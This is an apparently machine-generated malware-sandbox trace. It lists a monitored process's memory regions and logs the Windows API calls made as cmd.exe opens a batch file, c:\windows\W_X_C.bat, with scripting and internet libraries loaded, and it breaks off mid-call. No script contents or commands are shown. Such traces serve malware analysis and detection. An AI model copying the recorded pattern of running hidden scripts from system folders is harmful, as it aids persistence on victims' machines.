Region: id = 1685 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1686 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1687 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1688 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1689 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1690 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1691 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1692 start_va = 0x340000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 1693 start_va = 0x75350000 end_va = 0x7538efff monitored = 0 entry_point = 0x7537e088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1694 start_va = 0x752f0000 end_va = 0x7534bfff monitored = 0 entry_point = 0x7532f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1695 start_va = 0x752e0000 end_va = 0x752e7fff monitored = 0 entry_point = 0x752e20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1696 start_va = 0x77660000 end_va = 0x7777efff monitored = 0 entry_point = 0x77675340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1697 start_va = 0x75a80000 end_va = 0x75b8ffff monitored = 0 entry_point = 0x75a93283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1698 start_va = 0x77660000 end_va = 0x7777efff monitored = 0 entry_point = 0x77675340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1699 start_va = 0x77660000 end_va = 0x7777efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077660000" filename = "" Region: id = 1700 start_va = 0x77780000 end_va = 0x77879fff monitored = 0 entry_point = 0x7779a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1701 start_va = 0x77780000 end_va = 0x77879fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077780000" filename = "" Region: id = 1702 start_va = 0x560000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1703 start_va = 0x75a80000 end_va = 0x75b8ffff monitored = 0 entry_point = 0x75a93283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1704 start_va = 0x77240000 end_va = 0x77286fff monitored = 0 entry_point = 0x772474c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1705 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1706 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1707 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1710 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1711 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1712 start_va = 0x76dc0000 end_va = 0x76e6bfff monitored = 0 entry_point = 0x76dca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1713 start_va = 0x72c40000 end_va = 0x72c46fff monitored = 0 entry_point = 0x72c41230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 1714 start_va = 0x75980000 end_va = 0x75a7ffff monitored = 0 entry_point = 0x7599b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1715 start_va = 0x771b0000 end_va = 0x7723ffff monitored = 0 entry_point = 0x771c6343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1716 start_va = 0x75820000 end_va = 0x75829fff monitored = 0 entry_point = 0x758236a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1717 start_va = 0x75bc0000 end_va = 0x75c5cfff monitored = 0 entry_point = 0x75bf3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1718 start_va = 0x76f40000 end_va = 0x76fdffff monitored = 0 entry_point = 0x76f549e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1719 start_va = 0x75960000 end_va = 0x75978fff monitored = 0 entry_point = 0x75964975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1720 start_va = 0x774e0000 end_va = 0x775cffff monitored = 0 entry_point = 0x774f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1721 start_va = 0x755b0000 end_va = 0x7560ffff monitored = 0 entry_point = 0x755ca3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1722 start_va = 0x755a0000 end_va = 0x755abfff monitored = 0 entry_point = 0x755a10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1723 start_va = 0x340000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 1724 start_va = 0x4e0000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 1725 start_va = 0xe0000 end_va = 0xfdfff monitored = 0 entry_point = 0xf158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1726 start_va = 0x560000 end_va = 0x6e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 1727 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 1728 start_va = 0xe0000 end_va = 0xfdfff monitored = 0 entry_point = 0xf158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1729 start_va = 0x76920000 end_va = 0x7697ffff monitored = 0 entry_point = 0x7693158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1730 start_va = 0x76e70000 end_va = 0x76f3bfff monitored = 0 entry_point = 0x76e7168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1731 start_va = 0x800000 end_va = 0x980fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 1732 start_va = 0x990000 end_va = 0x1d8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 1733 start_va = 0xe0000 end_va = 0xfffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cmd.exe.mui") Region: id = 1734 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1735 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1736 start_va = 0x110000 end_va = 0x11ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1764 start_va = 0x75cc0000 end_va = 0x76909fff monitored = 0 entry_point = 0x75d41601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1765 start_va = 0x75c60000 end_va = 0x75cb6fff monitored = 0 entry_point = 0x75c79ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1766 start_va = 0x120000 end_va = 0x121fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 1767 start_va = 0x74680000 end_va = 0x7481dfff monitored = 0 entry_point = 0x746ae6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1768 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1769 start_va = 0x140000 end_va = 0x141fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 1770 start_va = 0x130000 end_va = 0x130fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1771 start_va = 0x1d90000 end_va = 0x205efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1794 start_va = 0x410000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1795 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1796 start_va = 0x2100000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 1797 start_va = 0x76c60000 end_va = 0x76dbbfff monitored = 0 entry_point = 0x76caba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1798 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1799 start_va = 0x744d0000 end_va = 0x7454ffff monitored = 0 entry_point = 0x744e37c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1800 start_va = 0x2200000 end_va = 0x240ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 1803 start_va = 0x2200000 end_va = 0x22defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002200000" filename = "" Region: id = 1804 start_va = 0x23d0000 end_va = 0x240ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 1805 start_va = 0x738c0000 end_va = 0x739b4fff monitored = 0 entry_point = 0x738d0d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 1806 start_va = 0x775d0000 end_va = 0x7765efff monitored = 0 entry_point = 0x775d3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1814 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 1815 start_va = 0x77450000 end_va = 0x774d2fff monitored = 0 entry_point = 0x774523d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1816 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 1830 start_va = 0x74640000 end_va = 0x74660fff monitored = 0 entry_point = 0x7464145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1831 start_va = 0x77400000 end_va = 0x77444fff monitored = 0 entry_point = 0x774011e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 1832 start_va = 0x170000 end_va = 0x173fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 1833 start_va = 0x180000 end_va = 0x1a7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db") Region: id = 1834 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1835 start_va = 0x2410000 end_va = 0x2510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 1836 start_va = 0x2410000 end_va = 0x2510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 1837 start_va = 0x2410000 end_va = 0x2510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 1838 start_va = 0x74670000 end_va = 0x7467afff monitored = 0 entry_point = 0x74671992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1839 start_va = 0x170000 end_va = 0x173fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1840 start_va = 0x1c0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000019.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db") Region: id = 1841 start_va = 0x230000 end_va = 0x233fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1842 start_va = 0x340000 end_va = 0x3a5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1843 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 1844 start_va = 0x76fe0000 end_va = 0x77115fff monitored = 0 entry_point = 0x76fe1b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1845 start_va = 0x772f0000 end_va = 0x773e4fff monitored = 0 entry_point = 0x772f1865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1846 start_va = 0x75610000 end_va = 0x7580afff monitored = 0 entry_point = 0x756122d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1847 start_va = 0x75830000 end_va = 0x75950fff monitored = 0 entry_point = 0x7583158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1848 start_va = 0x773f0000 end_va = 0x773fbfff monitored = 0 entry_point = 0x773f238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1849 start_va = 0x2410000 end_va = 0x250ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 1850 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 1851 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 1852 start_va = 0x26b0000 end_va = 0x27affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 1853 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1877 start_va = 0x3d0000 end_va = 0x3f5fff monitored = 0 entry_point = 0x3d2f3b region_type = mapped_file name = "wscript.exe" filename = "\\Windows\\SysWOW64\\wscript.exe" (normalized: "c:\\windows\\syswow64\\wscript.exe") Region: id = 1878 start_va = 0x400000 end_va = 0x402fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wscript.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\wscript.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wscript.exe.mui") Region: id = 1879 start_va = 0x2340000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 1880 start_va = 0x2880000 end_va = 0x297ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 1881 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Thread: id = 72 os_tid = 0xb4c [0166.788] GetProcAddress (hModule=0x75a80000, lpProcName="SetConsoleInputExeNameW") returned 0x75aaa775 [0166.788] GetProcessHeap () returned 0x700000 [0166.788] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x400a) returned 0x716ad0 [0166.789] GetProcessHeap () returned 0x700000 [0166.789] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x716ad0 | out: hHeap=0x700000) returned 1 [0166.790] _wcsicmp (_String1="c:\\windows\\W_X_C.bat", _String2=")") returned 58 [0166.790] _wcsicmp (_String1="FOR", _String2="c:\\windows\\W_X_C.bat") returned 3 [0166.791] _wcsicmp (_String1="FOR/?", _String2="c:\\windows\\W_X_C.bat") returned 3 [0166.791] _wcsicmp (_String1="IF", _String2="c:\\windows\\W_X_C.bat") returned 6 [0166.791] _wcsicmp (_String1="IF/?", _String2="c:\\windows\\W_X_C.bat") returned 6 [0166.791] _wcsicmp (_String1="REM", _String2="c:\\windows\\W_X_C.bat") returned 15 [0166.791] _wcsicmp (_String1="REM/?", _String2="c:\\windows\\W_X_C.bat") returned 15 [0166.791] GetProcessHeap () returned 0x700000 [0166.791] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x58) returned 0x700a40 [0166.791] GetProcessHeap () returned 0x700000 [0166.791] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x32) returned 0x700aa0 [0166.792] GetConsoleTitleW (in: lpConsoleTitle=0x33f668, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0166.792] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0166.792] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0166.792] GetVolumeInformationW (in: lpRootPathName="c:\\", lpVolumeNameBuffer=0x33f424, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x33f41c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x33f41c*=0x8443a5af, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0166.792] GetProcessHeap () returned 0x700000 [0166.792] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x210) returned 0x700ae0 [0166.792] GetProcessHeap () returned 0x700000 [0166.793] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x32) returned 0x700cf8 [0166.793] _wcsnicmp (_String1="c:\\w", _String2="cmd ", _MaxCount=0x4) returned -51 [0166.793] GetProcessHeap () returned 0x700000 [0166.793] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x418) returned 0x700d38 [0166.793] SetErrorMode (uMode=0x0) returned 0x8001 [0166.793] SetErrorMode (uMode=0x1) returned 0x0 [0166.793] GetFullPathNameW (in: lpFileName="c:\\windows\\.", nBufferLength=0x208, lpBuffer=0x700d40, lpFilePart=0x33f188 | out: lpBuffer="c:\\windows", lpFilePart=0x33f188*="windows") returned 0xa [0166.793] SetErrorMode (uMode=0x8001) returned 0x1 [0166.793] GetProcessHeap () returned 0x700000 [0166.793] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x700d38, Size=0x32) returned 0x700d38 [0166.793] GetProcessHeap () returned 0x700000 [0166.793] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x700d38) returned 0x32 [0166.793] NeedCurrentDirectoryForExePathW (ExeName="c:\\windows\\.") returned 1 [0166.793] GetProcessHeap () returned 0x700000 [0166.793] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x24) returned 0x700d78 [0166.793] GetProcessHeap () returned 0x700000 [0166.793] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x3c) returned 0x700da8 [0166.794] GetProcessHeap () returned 0x700000 [0166.794] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x700da8, Size=0x24) returned 0x700da8 [0166.794] GetProcessHeap () returned 0x700000 [0166.794] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x700da8) returned 0x24 [0166.794] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a3d0640, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0166.794] GetProcessHeap () returned 0x700000 [0166.794] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0xe0) returned 0x700dd8 [0166.800] GetProcessHeap () returned 0x700000 [0166.800] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x700dd8, Size=0x76) returned 0x700dd8 [0166.800] GetProcessHeap () returned 0x700000 [0166.801] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x700dd8) returned 0x76 [0166.802] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0166.802] FindFirstFileExW (in: lpFileName="c:\\windows\\W_X_C.bat" (normalized: "c:\\windows\\w_x_c.bat"), fInfoLevelId=0x1, lpFindFileData=0x33ef24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33ef24) returned 0x700e58 [0166.802] GetProcessHeap () returned 0x700000 [0166.802] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x14) returned 0x7119e0 [0166.802] FindClose (in: hFindFile=0x700e58 | out: hFindFile=0x700e58) returned 1 [0166.802] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0166.802] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0166.802] GetConsoleTitleW (in: lpConsoleTitle=0x33f3fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0166.803] GetProcessHeap () returned 0x700000 [0166.803] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x11c) returned 0x700e58 [0166.803] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x76f40000 [0166.803] GetProcAddress (hModule=0x76f40000, lpProcName="SaferIdentifyLevel") returned 0x76f62102 [0166.803] IdentifyCodeAuthzLevelW () returned 0x1 [0166.809] GetProcAddress (hModule=0x76f40000, lpProcName="SaferComputeTokenFromLevel") returned 0x76f63352 [0166.809] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0166.809] GetProcAddress (hModule=0x76f40000, lpProcName="SaferCloseLevel") returned 0x76f63825 [0166.809] CloseCodeAuthzLevel () returned 0x1 [0166.809] SetErrorMode (uMode=0x0) returned 0x8001 [0166.809] SetErrorMode (uMode=0x1) returned 0x0 [0166.809] GetFullPathNameW (in: lpFileName="c:\\windows\\W_X_C.bat", nBufferLength=0x104, lpBuffer=0x700ae8, lpFilePart=0x33f2e8 | out: lpBuffer="c:\\windows\\W_X_C.bat", lpFilePart=0x33f2e8*="W_X_C.bat") returned 0x14 [0166.809] SetErrorMode (uMode=0x8001) returned 0x1 [0166.809] GetProcessHeap () returned 0x700000 [0166.810] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x32) returned 0x70f7a0 [0166.810] CmdBatNotification () returned 0x700b0e [0166.810] CreateFileW (lpFileName="c:\\windows\\W_X_C.bat" (normalized: "c:\\windows\\w_x_c.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x33f32c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0166.810] _open_osfhandle (_OSFileHandle=0x80, _Flags=8) returned 3 [0166.810] _get_osfhandle (_FileHandle=3) returned 0x80 [0166.810] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.810] _get_osfhandle (_FileHandle=3) returned 0x80 [0166.810] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, 